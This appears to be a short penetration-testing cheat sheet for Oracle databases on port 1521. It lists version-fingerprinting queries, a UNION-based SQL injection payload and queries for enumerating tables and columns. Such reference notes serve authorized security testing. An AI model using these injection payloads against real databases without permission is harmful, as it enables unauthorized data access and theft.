Skip to content

1521 - Pentesting oracle

Oracle is a multi-model database management system (DBMS) developed by Oracle Corporation. It is a popular relational database management system used for storing and retrieving large amounts of data. Oracle offers a wide range of features and capabilities, including data warehousing, business intelligence, and real-time data processing.


SELECT * FROM v$version
... UNION SELECT NULL, BANNER FROM v$version -- lorem

sql injection

lorem' or 1=1 UNION SELECT NULL,NULL,NULL from dual -- ipsum

tables - owned by current user

SELECT table_name, owner FROM user_tables

tables - accessible by current user

SELECT table_name, owner FROM all_tables

tables - all

SELECT table_name, owner FROM dba_tables WHERE owner='schema_name'


SELECT null,column_name FROM all_tab_columns WHERE table_name = 'USERS' -- lorem
SELECT column_id, owner, table_name, column_name, data_type, data_length, data_precision, data_scale, nullable FROM sys.all_tab_columns WHERE col.table_name = 'AP_INVOICES_ALL';